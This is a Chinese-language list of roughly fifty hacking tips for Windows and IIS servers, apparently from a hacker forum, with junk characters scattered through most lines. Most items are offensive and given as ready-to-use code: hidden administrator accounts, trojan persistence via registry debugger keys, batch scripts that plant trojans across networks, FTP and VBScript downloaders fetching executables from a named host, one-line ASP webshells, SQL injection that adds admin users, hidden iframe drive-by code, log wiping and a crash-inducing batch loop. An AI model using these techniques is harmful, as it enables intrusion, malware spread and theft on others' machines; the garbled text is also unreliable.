Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
& K* L' ^- b0 x7 U( ~9 l% ccacls C:\windows\system32 /G hqw20:R
! p: t9 ~2 o" e2 y" ~( Z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, T1 w# }3 ?. C恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 B$ k% y4 I4 N/ W; ]- P" c
0 O5 b o7 I: o3 s: ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
x# \/ J4 _. J6 N/ P( S) ]6 N, V6 i" ~6 h* d
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
- k4 \0 Q( S. P! P. E% K# u7 @: `7 b; W
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ v% S9 W v0 W
2 @8 t3 G- [2 ?2 {) @9 ?( w5、利用INF文件来修改注册表+ a1 a/ ^+ _+ @$ j4 r
[Version] [3 @2 m9 _9 U% ?! C I2 A
Signature="$CHICAGO$"4 v! c: s9 T9 ~6 K9 A( l6 v7 y
[Defaultinstall]
" E* e* a. y# h2 J; w+ BaddREG=Ating' B4 ~, @- u% B3 `( n/ r( L
[Ating]5 ~ N. e4 @5 n
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
' G5 ~" f4 ^! [2 t# T! H9 k! R以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
- x; _: a3 z ?9 `/ G- }# t$ Qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
$ |# {& N* f/ @其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU: ^7 ~- s) B& Q8 P
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU' \: J1 U+ |2 H: \( m
HKEY_CURRENT_CONFIG 简写为 HKCC
6 \% \( P, t% l7 q0 p! S5 C* T0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
- j2 O! R2 B6 U7 v/ H- ~7 k9 z/ w"1"这里代表是写入或删除注册表键值中的具体数据
* [. l. v/ g$ Z2 G
: L* i0 U }& U$ V& h( P% D9 x6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 g& s: ]$ `, A多了一步就是在防火墙里添加个端口,然后导出其键值; ]7 O+ q# d8 V
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
7 t0 `7 V# C/ K1 A8 G2 Y& g5 r3 K( v; U( }! c
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 P) \2 c6 @1 l Q7 W
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
r- H3 t3 W$ B& i" T, K
, x4 Z1 g$ t+ M6 G8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
1 L: k( r! S5 B
7 S5 Q% e- P3 ]! ?9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,2 g1 S; t6 H$ D* w, e+ v a
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
5 }: S# W' q5 P( z4 M$ ?
& i+ B9 C. o$ k. }$ a- P10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 E e) J1 ~; ]& H. C4 F7 O- h+ s f6 ~# j* o1 [) v' E' A& P+ r9 q
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ i1 a' l" l. U! Z4 \1 K k3 `用法:xsniff –pass –hide –log pass.txt
- C* w! F/ s- a3 J3 ^5 @
1 u4 z/ n0 S2 F12、google搜索的艺术
; K& @' |2 j p2 q3 u0 t6 h搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”2 T" u' m! |* b. Z) r8 l5 I
或“字符串的语法错误”可以找到很多sql注入漏洞。& M# ^% X# Z, u! V+ N; B; g3 w1 d
0 Y$ e1 b4 j+ g6 W& T3 a
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。1 C+ T, x0 R6 ]0 w/ H2 E/ ?. J
% y% F7 f* I" F4 P, n0 h3 [7 I14、cmd中输入 nc –vv –l –p 1987. e& v. _" x) ?. G- d% @
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) P9 l a$ Q6 O# `7 [
+ @* B$ j9 c0 O( T! U15、制作T++木马,先写个ating.hta文件,内容为
5 j3 J/ i! `9 |+ Q<script language="VBScript">
" j% R+ g; y* z+ ]8 t1 ]set wshshell=createobject ("wscript.shell" )
8 i5 @' Y, D/ }3 T5 Qa=wshshell.run("你马的名称",1)/ D+ t- x8 l5 }3 i+ {4 d% r) l
window.close* ^8 ~" k+ g8 O3 t% q7 K7 V% t8 c
</script>& K4 e* J. V8 h' ]
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. X# r- Q& ~' H' a5 X6 \" _( g; U2 U- T6 C9 n. ]1 f, E N
16、搜索栏里输入
7 q! N% x; D2 t n关键字%'and 1=1 and '%'='
( y1 o% Y p1 K& K) s+ r关键字%'and 1=2 and '%'='
. H7 M2 \; z d( s( O2 _比较不同处 可以作为注入的特征字符: f. `/ _* a% v& Y6 q
+ M( ]. ]$ b( B; F: N) ]3 k9 c
17、挂马代码<html>
+ Q3 p9 H# a( Z+ O$ |5 O4 Y- q<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe> G6 k. F9 U2 r1 j5 b
</html>& D4 L6 L; z: W
7 i& m$ } F1 B* A$ u18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,3 r1 r9 |! x) F9 [
net localgroup administrators还是可以看出Guest是管理员来。
. _( `* A1 J8 Y& W, J0 j. b: q2 v) c% j6 Y4 B- i
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' V0 s3 V4 [; e* V1 h S7 P用法: 安装: instsrv.exe 服务名称 路径
- c% T+ G# c' _- R$ g' \$ I卸载: instsrv.exe 服务名称 REMOVE# c5 o8 f( {4 m: L O0 o
+ F. U! v% S* q: |0 Q) E
, _" {3 b9 w( i D( ?/ Z% `
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 R. G1 n. X/ }, U- _
不能注入时要第一时间想到%5c暴库。/ V3 N$ M, b9 x5 [& V1 D1 E& G; a
) E4 R4 m/ r; N4 S& c7 d# d22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~- W, q3 F% ?% U2 h
+ f8 _; I' Q$ ?% y7 m' w23、缺少xp_cmdshell时( s K. U) c' d1 L% ?% C t0 b+ d5 B
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ c, a* x5 J" I( b, G, e假如恢复不成功,可以尝试直接加用户(针对开3389的)
8 z I8 K7 T, m0 M4 \* ?2 A8 |declare @o int3 L3 |: g* _/ T2 E
exec sp_oacreate 'wscript.shell',@o out
5 v8 D r& _$ C7 B! p1 x7 ~" u- o+ Y. rexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 |; P" I' l/ ?5 k% l9 ^- Q0 j7 X+ o3 J. L7 B8 s
24.批量种植木马.bat
7 u0 e/ A$ O; m3 j& E( Lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 o& T0 f( C& R4 @, P) S. x
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间1 }! @; v% q9 R6 P6 q& J% {
扫描地址.txt里每个主机名一行 用\\开头8 j3 M+ H. k8 h/ w; Q
8 n- e; p. W, L' M$ l# t8 z- L) x2 R
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 O7 J8 r- R8 D b
$ ]! d3 u, l1 g w1 Q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 z" a! Q, {+ g, y c2 ^, v& B8 e将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下." {) o+ o9 _9 v x& Q% i6 t
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
: F8 |' E2 b/ ?" ?- W3 g% ?7 }$ i/ f, ?
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 Y0 p, r; D, `, x9 s然后用#clear logg和#clear line vty *删除日志
x- |7 T; O" F; D+ y4 r9 i
, f9 _0 m; W [; r5 H! s28、电脑坏了省去重新安装系统的方法
% @, D2 u- W1 r6 O6 l纯dos下执行,
+ k! L/ u9 C( lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
( j4 X8 l& z" s9 J2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config: Z% _+ B* y3 Z( G
' u/ a4 W9 y- u7 f3 a
29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 R, q$ ?4 U2 k) hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 s- ?( Y0 p* y; A4 w" x
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 U" ~, \! F( i1 c8 b/ pHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
w: s- Y4 I N* {- d% |8 z分别用
& \$ f X( g& i( V2 }& h: s3 Tregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% M3 C" }! g X8 F3 h$ M, K
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 ]5 l3 T; t' S+ w9 G Y' L
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; I7 e$ S' u7 a1 x+ H# D命令来导出注册表项" @2 e' _( G8 Z3 T1 W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,5 N) J/ ?0 m- V% F! B5 m9 ^
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用; S* |) H- W& m* B7 J
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# ~$ E& ~4 k0 }2 g* A# w" I4 \4 b9 E9 e+ S& x# _
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U3 u5 d; o# W# {8 W3 f
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 M3 u1 P, K1 t) s, n6 o3 \0 x3 j( V! [* p
31、全手工打造开3389工具
# |2 J, `- m/ u. t/ s& a( J% A3 R/ J打开记事本,编辑内容如下:9 @6 q1 z7 C! o; a4 `# }6 [4 T
echo [Components] > c:\sql( h, s4 b! k7 r8 d& Z
echo TSEnable = on >> c:\sql
8 c$ n; E" o: [/ Hsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
0 d" i m0 {1 p% b" }; U& A编辑好后存为BAT文件,上传至肉鸡,执行( s& y8 d# `0 J3 u) @
* u6 E/ W+ _3 N' s# D, N# e3 z: `
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( N/ Z k$ s+ a* C! A, z; n k4 c: f% ^; u" w, J0 d6 R; ^
33、让服务器重启' h- [7 N/ N; w8 K/ ~ G
写个bat死循环:
S' q% K0 h% g/ S@echo off; i+ u( N! ~8 L6 Z
:loop1
" M8 W2 V* h/ n+ s% |' |2 Ncls$ Z7 T) ^' H. a; g: V$ G& N: E9 m
start cmd.exe
- h& J% B" {5 R& [/ h6 w. G! Egoto loop1( f0 R( c9 H% w4 a7 o* H! q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
- A* _9 s! Y6 K8 E) |8 ^# v$ e; ]( c; h" i0 k9 @
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
$ d6 E# g. j) N( m1 b@echo off
" g" m' y" U0 z- @: ^date /t >c:/3389.txt
- J( _) N* Z0 ~% `1 o2 g3 m$ ^time /t >>c:/3389.txt
9 j- Q+ [& r, A) a2 V3 C9 @ H, gattrib +s +h c:/3389.bat
/ `6 g, M' B1 _* v" G9 [attrib +s +h c:/3389.txt
( Y+ _6 s/ f5 _/ c% z3 @netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt* R% v( Y3 n3 K4 I# m4 e7 b7 F3 _
并保存为3389.bat) q9 Z- |8 b9 w, o% D; h" w) V
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号0 p5 X* A: G" D) `& @
7 Z' q. l+ i% z" q) u7 q
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
! o& z4 \2 M9 h2 B2 ?start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- E7 Q) ~( z: R% ~9 h输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 l( j8 T7 [' F/ L/ b V+ Y/ J
: H+ w3 z, d% q. c; I* V
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 v4 c' M+ |4 Z& d! Y qecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址* v, R+ m3 q( ?+ K* O9 y7 U) p, s
echo 你的FTP账号 >>c:\1.bat //输入账号
* k: F% x* z- P, x8 [$ d% secho 你的FTP密码 >>c:\1.bat //输入密码5 h$ X; g3 q0 u( F
echo bin >>c:\1.bat //登入
* F1 X9 Q- d9 f, q7 H. u$ g1 j4 J9 recho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
B3 ]2 V/ S% \* H- S3 Y$ pecho bye >>c:\1.bat //退出
1 q* D! C" V: [然后执行ftp -s:c:\1.bat即可
; a0 o% z5 e+ C* P- @& n# H/ W2 c8 T7 z
37、修改注册表开3389两法
9 p( H4 a" y7 l h(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表9 T* K- s: @$ W4 K
echo Windows Registry Editor Version 5.00 >>3389.reg
. X* p2 z8 K1 f6 D2 o+ [+ ^6 @: C: Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg0 i( G9 P" U9 p( Y5 w9 s
echo "Enabled"="0" >>3389.reg* h* O! ?5 o1 t2 k7 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows: d" ?' _. ~# y
NT\CurrentVersion\Winlogon] >>3389.reg" O1 Z% d4 n4 j% F
echo "ShutdownWithoutLogon"="0" >>3389.reg
! t+ |! w! p y# {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& R- F9 c1 N. m t! c3 _# e# h
>>3389.reg) e& [! R6 U% [. y1 t7 I/ J
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg; s. J5 [! K. z" x- V% d' [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
! D K0 r8 s1 I* ~>>3389.reg
0 G# R6 a( v% V( }echo "TSEnabled"=dword:00000001 >>3389.reg
6 k( Z7 `6 x. [" p6 Y$ R5 m! L$ Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
5 N" ^6 _$ S1 b, t" Uecho "Start"=dword:00000002 >>3389.reg, O& {) w! L& B( x2 b) w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]3 L4 @* Z/ |" M# {6 _6 S" ]
>>3389.reg
" p7 L; n g* O* S5 S7 _. Techo "Start"=dword:00000002 >>3389.reg. `; [" R) x) B" H
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
% V3 d& i0 n9 P. C# a) Qecho "Hotkey"="1" >>3389.reg' b. O4 U+ U* G" J2 Q7 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 X& [. R8 l( t- k* E% GServer\Wds\rdpwd\Tds\tcp] >>3389.reg
0 |7 x& ]6 \3 j* f- d \+ ]echo "PortNumber"=dword:00000D3D >>3389.reg
7 }( K4 B5 `4 m8 P, ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 t$ S, z5 d0 m' RServer\WinStations\RDP-Tcp] >>3389.reg) D6 b9 t( B: K% Y6 x
echo "PortNumber"=dword:00000D3D >>3389.reg, S% P1 e' S I* G8 H s1 i9 ^
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; q, E6 n! W w" `1 ?% Y1 x
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% o$ u+ G& T/ R因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 E( m& z) z0 a/ \7 Z
(2)winxp和win2003终端开启3 K4 Y0 X* N* H' _5 U
用以下ECHO代码写一个REG文件:6 l4 `; K/ J* W3 |- f5 o3 D) O6 w
echo Windows Registry Editor Version 5.00>>3389.reg
; h$ w E/ p n8 i mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 N/ {( H, F) V) Q. |Server]>>3389.reg
. @" h2 x$ b+ r* `echo "fDenyTSConnections"=dword:00000000>>3389.reg- b' a/ J/ C7 }$ K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ `2 U) S1 b: O7 Q, k* T/ _( BServer\Wds\rdpwd\Tds\tcp]>>3389.reg6 J7 c8 H, @0 h3 q3 ]. J( n# o
echo "PortNumber"=dword:00000d3d>>3389.reg& n& l0 e; h9 \# `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! Q8 e! X; H2 I' ^, N. V
Server\WinStations\RDP-Tcp]>>3389.reg
1 t5 A. H4 N: F H1 decho "PortNumber"=dword:00000d3d>>3389.reg/ g! [6 j) n3 K# n+ N8 w5 S
然后regedit /s 3389.reg del 3389.reg
0 P- f O# c5 m2 ^XP下不论开终端还是改终端端口都不需重启
8 E3 k4 x; M" K6 j8 O6 l+ v3 z8 J! a4 Y1 C- a6 g
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 h" k3 l1 I* F1 c
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'. m) w$ M* ?7 Z, N
6 ^+ P! w/ b1 ~9 _; G( k39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 r2 ~ N9 q" [ M5 x8 A3 V
(1)数据库文件名应复杂并要有特殊字符
- [2 M. o5 \8 n+ @; N(2)不要把数据库名称写在conn.asp里,要用ODBC数据源7 }4 A# ]* L# ~+ G7 q2 d
将conn.asp文档中的. x4 ~7 k' _8 ]2 ~) g" u% J/ Q* ^3 C& H
DBPath = Server.MapPath("数据库.mdb")" b% s/ F9 `- G& ]
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 a) p, Y, ^7 M8 c) ]2 ^
% R% g( q/ J! d" J) Y( B. |) S修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
/ b: p6 o* a }9 [% p(3)不放在WEB目录里' U; I, x: V$ l" g
7 Q9 y* \+ {6 B40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, f1 Q. u( j) S6 m- R3 i可以写两个bat文件
8 h4 c" T. [4 v1 f! p3 `2 Z' K@echo off3 Z# L' D8 Y7 Z1 @2 ~6 }4 c/ {1 H& ~
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 V; a* G8 z- }% o3 r@del c:\winnt\system32\query.exe# c, _' z& |, L3 W1 q
@del %SYSTEMROOT%\system32\dllcache\query.exe
6 q; A' j7 m" w, D@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
; Z+ F d5 f' a, b5 I- G2 _
+ Z" @5 l# r$ [8 Y@echo off1 i6 v. t! C p, h; Q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 m: Y% B' [; p# |' e5 E+ D% F u5 F@del c:\winnt\system32\tsadmin.exe: X/ W' e8 B+ i0 I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
a- u; d8 t$ d9 s V! m* |1 o. i
|7 U1 y8 T. G' D) R41、映射对方盘符
8 z' B7 f% S% ~# gtelnet到他的机器上,. b* s% B5 M- U
net share 查看有没有默认共享 如果没有,那么就接着运行
_5 x! J- F6 R1 inet share c$=c:' n. {9 v/ ?# ^, ^) u: f6 V
net share现在有c$
# R0 F3 n! V# N3 q9 D( z' B在自己的机器上运行& B% Q) h9 y' { L. J# |
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 h3 e" @* C X. y9 y
6 b2 S! p: H9 i42、一些很有用的老知识
0 {* k7 w( @! M$ ?type c:\boot.ini ( 查看系统版本 ). k( O- R7 L- O, x
net start (查看已经启动的服务)" i8 Y: Q" G( y w9 r3 d
query user ( 查看当前终端连接 )
6 R& g( a. F3 `4 X( F8 j1 ]; Snet user ( 查看当前用户 ); V' K0 q* g/ P1 Q c
net user 用户 密码/add ( 建立账号 )# S$ |% S" O5 g) C
net localgroup administrators 用户 /add (提升某用户为管理员)4 @/ h0 `8 v& N* u( Q. d
ipconfig -all ( 查看IP什么的 )1 c3 `, g% h' q0 Q- D9 s
netstat -an ( 查看当前网络状态 )
' E9 U3 J& Q N+ q) n9 C* n# sfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)- }- ?4 H5 s% }7 X( Q
克隆时Administrator对应1F4
1 z1 A$ X9 W/ Oguest对应1F5: W" ? Y R; I- x0 b; v
tsinternetuser对应3E8
' f' N) o( v" R# u9 k
" u+ j9 K" s* b5 Z" X) g7 [! C- V43、如果对方没开3389,但是装了Remote Administrator Service
5 c$ z+ H# _( t2 a p3 }: W% L用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
* r. R! i: Z; g, g5 {0 I* b解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
: ^8 n6 D9 s& g. Z/ f4 y. b: a- L: l先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
/ n/ W. p$ H& z9 V' n1 T' u* G- B, c! W4 k" O1 l
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 ~% Q; O. \( T. T8 C: [
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
; t5 C- m) i6 X8 ~- L
/ Q# j4 C2 N6 H p0 k7 r45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
9 h: _4 z v7 j6 ]: a, c% iecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open$ H% m: u, Z2 p/ `) s
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: r' K- q( q5 O" {3 B. y, MCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: p/ W6 y. [; q5 k# Z P
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs3 m5 U: j- o1 k
(这是完整的一句话,其中没有换行符)/ ^0 Q+ b0 p! @7 N' c
然后下载: ?. r) Q) @7 s- K' S: ~8 w1 ~
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
* p9 p, u3 p9 T) _/ d' M) {; ~2 ^8 @+ D9 \6 x; q6 ~# Y8 j
46、一句话木马成功依赖于两个条件:
! g B; A; r; j% V1 G" O6 ^/ q$ Q1、服务端没有禁止adodb.Stream或FSO组件
+ h* j+ k v, @" A" v& r2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
: \& N( H7 E8 j6 q7 @/ B% K- N
' `& S$ \* |9 ?6 I& [5 c! h; [/ L47、利用DB_OWNER权限进行手工备份一句话木马的代码:, ?" l1 c" U0 {- t
;alter database utsz set RECOVERY FULL--. a# }$ H, c0 w4 h
;create table cmd (a image)--# h. \2 L/ X- j! p. `' q5 b
;backup log utsz to disk = 'D:\cmd' with init--" m3 k: U5 z" Y, R4 T4 g
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--) b6 n5 l; c7 }- d
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ q. l$ n: D* j' T. h( v" u注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
& m. y8 [( g) j; a4 M. v9 @' f E
$ ]* g) |" B1 Q% P48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
2 p1 [2 t0 `/ e- i5 m3 t
' |1 F1 W& S8 N! |! K* i' C5 a# f用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options; J% K2 j O1 ?6 A& y/ |
所有会话用 'all'。
5 k6 d ] {. d! P/ E# `1 L: Q( d- I-s sessionid 列出会话的信息。: n X4 V# g. |! ~+ K
-k sessionid 终止会话。
0 M4 U% k: F; u# A5 @: Z2 a-m sessionid 发送消息到会话。8 T$ M; W$ y/ W0 e6 q4 l; Y2 P7 J7 ]
4 G( R1 f8 G8 }( M7 t7 Q% cconfig 配置 telnet 服务器参数。# a5 Q% J% `# ]9 v
5 N( g7 s5 V* n" Z3 R, ?1 N, X3 R
common_options 为:
! ~; h1 y) M: \-u user 指定要使用其凭据的用户* i) z. U8 ]; \* `2 g0 ^# S8 [
-p password 用户密码
& ^( H" }* N& Z3 k! N) N! q5 c/ H" x5 ^ @- y
config_options 为:! |8 e( z6 s: l0 Z
dom = domain 设定用户的默认域9 n/ V K: j3 H& Z* h& a' }
ctrlakeymap = yes|no 设定 ALT 键的映射& _- o2 W% ^7 j# p
timeout = hh:mm:ss 设定空闲会话超时值- ?2 ^( k3 Z7 u1 o. b* g) F
timeoutactive = yes|no 启用空闲会话。
* v2 p( h2 x& u& ]/ w ]. z \+ Qmaxfail = attempts 设定断开前失败的登录企图数。9 |# ]. O4 n c9 e5 T3 t
maxconn = connections 设定最大连接数。
8 N& Q' E* e; {$ c0 cport = number 设定 telnet 端口。% p M" i4 c8 |1 T& L0 c+ }
sec = [+/-]NTLM [+/-]passwd
; K( M; A0 D* i3 U Y" b" O4 K% M9 p设定身份验证机构
) S" p5 s5 V/ H" p! d. Ifname = file 指定审计文件名。
6 n3 k. b: v, t1 c" Vfsize = size 指定审计文件的最大尺寸(MB)。/ T4 {( s/ O. S) H k
mode = console|stream 指定操作模式。# C' |9 ~" D, y5 c' P- Q
auditlocation = eventlog|file|both8 E n; \! p9 b
指定记录地点
( f# z2 g# L, Q, Daudit = [+/-]user [+/-]fail [+/-]admin4 }1 d1 [3 p5 ]# g O8 }0 t! a9 P
$ ?8 |# i1 k% F" Y6 O' Z) Q n
49、例如:在IE上访问:: X1 F1 Q4 R) J( q ~& t
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/$ c1 I! y& c. `: |9 {& \: h
hack.txt里面的代码是:; p; n u4 ]7 L! M
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">2 a- e# S; b, g8 J. p5 e5 E, O$ C
把这个hack.txt发到你空间就可以了!
) t- ^* b3 h6 [ n1 b& _$ u这个可以利用来做网马哦!% d, n5 N* z, g, {: k
& t6 Q8 a9 p+ w+ T% D50、autorun的病毒可以通过手动限制!
2 O5 }7 s( [1 H; O9 a1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* n' `% O( \. j/ t* [5 b7 F* i
2,打开盘符用右键打开!切忌双击盘符~) M! L8 K, F2 K9 s
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( _- j e: h5 B$ u) I1 A$ x
- [7 j b, d" z3 N* Y# Y51、log备份时的一句话木马:
! Q; ^. U& H' X1 La).<%%25Execute(request("go"))%%25> E# i7 Q! S! [6 [/ u
b).<%Execute(request("go"))%>
/ }( _, e; D/ N/ Z7 D# oc).%><%execute request("go")%><%
7 \' U# b0 x( J* Dd).<script language=VBScript runat=server>execute request("sb")</Script>; F+ e7 O" [' q1 s
e).<%25Execute(request("l"))%25>
